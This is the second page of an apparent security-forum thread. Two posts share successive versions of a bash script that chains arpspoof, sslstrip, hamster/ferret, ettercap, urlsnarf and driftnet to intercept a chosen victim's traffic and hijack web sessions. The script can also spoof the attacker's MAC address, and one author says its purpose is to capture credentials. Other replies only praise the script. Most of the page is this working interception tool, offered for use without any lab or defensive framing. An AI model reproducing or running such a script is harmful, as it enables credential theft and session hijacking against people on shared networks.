Page 2 of 2 FirstFirst 12
Results 11 to 15 of 15

Thread: Another script for sidejacking..

  1. #11
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: Another script for sidejacking..

    awesome job, just checked this out. I like the cleanup

    I did however find a issue with the redirection for sslstrip, I corrected that and added driftnet.. not sure if that is just me or an actual bug on the source port redirect.

    Code:
    #!/bin/bash
    
    # sidejackssl.sh v0.2
    # tested in backtrack 4 R2 environment, run as root.
    # xterm used for window control
    # arpspoof poisons a single victim and gateway
    # ferret and hamster for sidejacking
    # sslstrip for https
    # ettercap for everything else
    # urlsnarf to monitor visited urls
    # driftnet for fun
    # firefox needs to be configured with a proxy of 127.0.0.1:1234
    # url for hamster server is http://hamster
    # by gorara
    
    # a few variables (do not change)
    m1="0"					# missing file var m1
    m2="0"					# missing file var m2
    m3="0"					# missing file var m3
    m4="0"					# missing file var m4
    quickclean="0"				# used for quick clean up
    randmac="n"				# default setting do not randomize MAC
    hamsterfile="hamster.txt"		# hamster output file (you can't change it)
    trap 'cleanup' SIGINT SIGTERM		# detect control-c
    
    # a few more variables (change these if required)
    
    # xterm window variables
    x="0"					# x offset value
    y="0"					# y offset value
    width="120"				# width value
    height="7"				# height value
    yoffset="120"				# y offset
    fgcolor="white"				# foreground color
    bgcolor="black"				# background color
    
    # style variables
    warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
    execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
    infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
    inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
    
    # file variables
    sslstripfile="sslstrip.log"		# sslstrip output file name
    snifffile="sniff-*"			# hamster sniff file wildcard
    etterfile="etter.cap"			# ettercap output cap file
    temp="/tmp"				# temporary dir
    
    function usage
    {
    	clear
    	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    	echo ""
    	echo "	-i interface	interface to use, ex. eth0, wlan0."
    	echo "	-t target	the target IP address."
    	echo "	-g gateway	the gateway IP address."
    	echo "	-r		randomize your MAC address,"
    	echo "			only use for wired interfaces."
    	echo "	-h		display this help screen."
    	echo ""
    	echo "	examples: "
    	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    	echo ""
    	exit 0
    }
    
    function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
    fi
    
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    
    # change back MAC address to orignal one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    rm $temp/mac.orig
    rm $temp/gw.orig
    fi
    
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    
    # testing to see if files exist, if so display them...
    	if [ -f $temp/$sslstripfile ]; then
    	ls $temp/$sslstripfile
    	else
    	#echo -e "$warnstyle missing $sslstripfile"
    	m1="1"
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	ls $temp/$etterfile
    	else
    	#echo -e "$warnstyle missing $etterfile"
    	m2="1"
    	fi
    
    echo -e "$infostyle current directory: "
    
    	if [ -f $snifffile ]; then
    	ls $snifffile
    	else
    	#echo -e "$warnstyle missing $snifffile"
    	m3="1"
    	fi
    
    	if [ -f $hamsterfile ]; then
    	ls $hamsterfile
    	else
    	#echo -e "$warnstyle missing $hamsterfile"
    	m4="1"
    	fi
    
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    
    while [[ "$delete" != "y" || "$delete" != "n" ]]
    
    echo -en "$infostyle delete file(s)? [y/n]: " 
    read delete
    
    do
        case "$delete" in
            y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    	n) echo -e "$warnstyle nothing deleted!"; break;;
        	*) echo -e "$warnstyle wrong selection!";
        esac
    done
    
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
    	if [ -f $temp/$sslstripfile ]; then
    	rm $temp/$sslstripfile
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	rm $temp/$etterfile
    	fi
    
    	if [ -f $snifffile ]; then
    	rm $snifffile
    	fi
    
    	if [ -f $hamsterfile ]; then
    	rm $hamsterfile
    	fi
    fi
    
    else
    
    	echo -e "$warnstyle nothing to delete!"
    fi
    
    echo -e "$infostyle all done!"
    exit 0
    }
    
    
    # start main program
    if [ "$#" -eq 0 ]; then
    usage
    fi
    
    while [ "$#" -gt 0 ]
    do
        case "$1" in
            -i)  interface=$2; shift 1;;
    	-r)  randmac="y"; shift 1;;
    	-t)  target=$2; shift 1;;
    	-g)  gateway=$2; shift 1;;
    	-h)  usage;;
    	-*)  usage; break;;
    	*)  break;;
        esac
        shift
    done
    
    # required parameters
    if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
    fi
    
    clear
    
    if [[ "$randmac" = "y" ]]; then
    mac="yes"
    else
    mac="no"
    fi
    
    # set quick cleanup flag
    quickclean="1"
    
    echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
    echo -e "$infostyle ctrl-c to abort at any time."
    echo -e "$infostyle attack summary:"
    echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
    
    if [[ "$randmac" = "y" ]]; then 
    
    echo -e "$execstyle change of $interface MAC address requested."
    
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..." 
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
    fi
    
    if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..." 
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    	if [[ "$continue" = "y" ]]; then
    	echo -e "$infostyle proceeding..."
    	else
    	echo -e "$infostyle exiting..."
    	exit 0	
    	fi
    fi
    
    origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
    
    fi
    
    # before this, ctrl-c will exit script without doing anything.
    quickclean="0"
    
    # use macchanger to randomize MAC address, ect.
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
    echo -e "$execstyle randomizing MAC address...";
    gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
    ifconfig $interface down
    macchanger -r $interface > $temp/mac.orig
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
    fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked    MAC is: $fakemac"
    fi
    
    echo -e "$execstyle turning on IP Forwarding..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo -e "$execstyle configuring iptables..."
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sleep 1
    
    echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
    sleep 2
    
    echo -e "$execstyle starting ferret   ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
    sleep 2
    
    echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -a -k -f -w $temp/$sslstripfile &
    sleep 2
    
    echo -e "$execstyle starting ettercap ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -T -q -p -i $interface &
    sleep 2
    
    echo -e "$execstyle starting urlsnarf ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
    sleep 2
    
    echo -e "$execstyle starting driftnet ... <logging to: console>"
    sleep 2
    driftnet -p -i $interface &
    
    
    echo -e "$infostyle trap is ready, now to direct traffic..."
    
    echo -e "$execstyle ARP poisoning the target..."
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
    sleep 1
    
    echo -e "$infostyle run firefox and type http://hamster"
    echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
    echo -e "$infostyle press ctrl-c to exit and clean up... \n"
    for ((;;)) do 
    read loop
    echo -en "$infostyle press ctrl-c to terminate!"
    done
    
    exit 0
    "When you get frustrated, you can swear at it:
    tell me how to spoof a ****ing wireless AP - Google Search" -ThePistonDoctor

  2. #12
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Re: Another script for sidejacking..

    supdgunman, thanks for checking it out, and for making the changes. Although there are a few things you missed out on, which I've fixed in the post below:

    Code:
    #!/bin/bash
    
    # sidejackssl.sh v0.2
    # tested in backtrack 4 R2 environment, run as root.
    # xterm used for window control
    # arpspoof poisons a single victim and gateway
    # ferret and hamster for sidejacking
    # sslstrip for https
    # ettercap for everything else
    # urlsnarf to monitor visited urls
    # driftnet for fun
    # firefox needs to be configured with a proxy of 127.0.0.1:1234
    # url for hamster server is http://hamster
    # by gorara
    
    # a few variables (do not change)
    m1="0"					# missing file var m1
    m2="0"					# missing file var m2
    m3="0"					# missing file var m3
    m4="0"					# missing file var m4
    quickclean="0"				# used for quick clean up
    randmac="n"				# default setting do not randomize MAC
    hamsterfile="hamster.txt"		# hamster output file (you can't change it)
    trap 'cleanup' SIGINT SIGTERM		# detect control-c
    
    # a few more variables (change these if required)
    
    # xterm window variables
    x="0"					# x offset value
    y="0"					# y offset value
    width="120"				# width value
    height="7"				# height value
    yoffset="120"				# y offset
    fgcolor="white"				# foreground color
    bgcolor="black"				# background color
    
    # style variables
    warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
    execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
    infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
    inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
    
    # file variables
    sslstripfile="sslstrip.log"		# sslstrip output file name
    snifffile="sniff-*"			# hamster sniff file wildcard
    etterfile="etter.cap"			# ettercap output cap file
    temp="/tmp"				# temporary dir
    
    function usage
    {
    	clear
    	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    	echo ""
    	echo "	-i interface	interface to use, ex. eth0, wlan0."
    	echo "	-t target	the target IP address."
    	echo "	-g gateway	the gateway IP address."
    	echo "	-r		randomize your MAC address,"
    	echo "			only use for wired interfaces."
    	echo "	-h		display this help screen."
    	echo ""
    	echo "	examples: "
    	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    	echo ""
    	exit 0
    }
    
    function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
    fi
    
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    
    # change back MAC address to orignal one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    rm $temp/mac.orig
    rm $temp/gw.orig
    fi
    
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    
    # testing to see if files exist, if so display them...
    	if [ -f $temp/$sslstripfile ]; then
    	ls $temp/$sslstripfile
    	else
    	#echo -e "$warnstyle missing $sslstripfile"
    	m1="1"
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	ls $temp/$etterfile
    	else
    	#echo -e "$warnstyle missing $etterfile"
    	m2="1"
    	fi
    
    echo -e "$infostyle current directory: "
    
    	if [ -f $snifffile ]; then
    	ls $snifffile
    	else
    	#echo -e "$warnstyle missing $snifffile"
    	m3="1"
    	fi
    
    	if [ -f $hamsterfile ]; then
    	ls $hamsterfile
    	else
    	#echo -e "$warnstyle missing $hamsterfile"
    	m4="1"
    	fi
    
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    
    while [[ "$delete" != "y" || "$delete" != "n" ]]
    
    echo -en "$infostyle delete file(s)? [y/n]: " 
    read delete
    
    do
        case "$delete" in
            y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    	n) echo -e "$warnstyle nothing deleted!"; break;;
        	*) echo -e "$warnstyle wrong selection!";
        esac
    done
    
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
    	if [ -f $temp/$sslstripfile ]; then
    	rm $temp/$sslstripfile
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	rm $temp/$etterfile
    	fi
    
    	if [ -f $snifffile ]; then
    	rm $snifffile
    	fi
    
    	if [ -f $hamsterfile ]; then
    	rm $hamsterfile
    	fi
    fi
    
    else
    
    	echo -e "$warnstyle nothing to delete!"
    fi
    
    echo -e "$infostyle all done!"
    exit 0
    }
    
    
    # start main program
    if [ "$#" -eq 0 ]; then
    usage
    fi
    
    while [ "$#" -gt 0 ]
    do
        case "$1" in
            -i)  interface=$2; shift 1;;
    	-r)  randmac="y"; shift 1;;
    	-t)  target=$2; shift 1;;
    	-g)  gateway=$2; shift 1;;
    	-h)  usage;;
    	-*)  usage; break;;
    	*)  break;;
        esac
        shift
    done
    
    # required parameters
    if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
    fi
    
    clear
    
    if [[ "$randmac" = "y" ]]; then
    mac="yes"
    else
    mac="no"
    fi
    
    # set quick cleanup flag
    quickclean="1"
    
    echo -e "$infostyle sidejacker/sslstrip script v0.2, by gorara"
    echo -e "$infostyle ctrl-c to abort at any time."
    echo -e "$infostyle attack summary:"
    echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
    
    if [[ "$randmac" = "y" ]]; then 
    
    echo -e "$execstyle change of $interface MAC address requested."
    
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..." 
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
    fi
    
    if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..." 
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    	if [[ "$continue" = "y" ]]; then
    	echo -e "$infostyle proceeding..."
    	else
    	echo -e "$infostyle exiting..."
    	exit 0	
    	fi
    fi
    
    origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
    
    fi
    
    # before this, ctrl-c will exit script without doing anything.
    quickclean="0"
    
    # use macchanger to randomize MAC address, ect.
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
    echo -e "$execstyle randomizing MAC address...";
    gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
    ifconfig $interface down
    macchanger -r $interface > $temp/mac.orig
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
    fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked    MAC is: $fakemac"
    fi
    
    echo -e "$execstyle turning on IP Forwarding..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo -e "$execstyle configuring iptables..."
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sleep 1
    
    echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
    sleep 2
    
    echo -e "$execstyle starting ferret   ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
    sleep 2
    
    echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -a -k -f -w $temp/$sslstripfile &
    sleep 2
    
    echo -e "$execstyle starting ettercap ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -T -q -p -i $interface &
    sleep 2
    
    echo -e "$execstyle starting urlsnarf ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
    sleep 2
    
    echo -e "$execstyle starting driftnet ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "driftnet" -e driftnet -p -i $interface &
    sleep 2
    
    echo -e "$infostyle trap is ready, now to direct traffic..."
    
    echo -e "$execstyle ARP poisoning the target..."
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
    sleep 1
    
    echo -e "$infostyle run firefox and type http://hamster"
    echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
    echo -e "$infostyle press ctrl-c to exit and clean up... \n"
    for ((;;)) do 
    read loop
    echo -en "$infostyle press ctrl-c to terminate!"
    done
    
    exit 0
    Regarding the sslstrip parameters, -a is used to log all traffic, which I left out on purpose being that the point is to capture credentials. The -k is to kill a sessions in progress, I'm not sure but maybe that helped with your issue, which by the way what was it exactly? The -f in my opinion doesn't look too great, so I left it out. In any case, the whole point is to be able to change it to whatever your preference is, so I'm glad you did that.

  3. #13
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: Another script for sidejacking..

    Nice! Worked great for me. Definitely handy dandy and a great script. Thanks!

  4. #14
    Member
    Join Date
    Feb 2010
    Posts
    69

    Default Re: Another script for sidejacking..

    Well done! Keep it up!

  5. #15
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Another script for sidejacking..

    Shoulda called it YASS - Yet Another Sidejacking Script

    Thanks for sharing!
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Page 2 of 2 FirstFirst 12

Similar Threads

  1. [Video] Session Sidejacking (Ferret and Hamster)
    By imported_g0tmi1k in forum OLD BackTrack 4 Howto
    Replies: 2
    Last Post: 03-19-2010, 08:57 PM
  2. Sidejacking on wep networks?
    By EndOfDays442 in forum Beginners Forum
    Replies: 1
    Last Post: 03-16-2010, 06:17 PM
  3. Sidejacking after decrypting WPA packets from capture
    By purehate in forum OLD BT4 Videos
    Replies: 0
    Last Post: 10-03-2009, 05:15 PM
  4. SideJacking
    By imported_Speedy in forum OLD Tutorials and Guides
    Replies: 6
    Last Post: 11-16-2008, 12:58 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •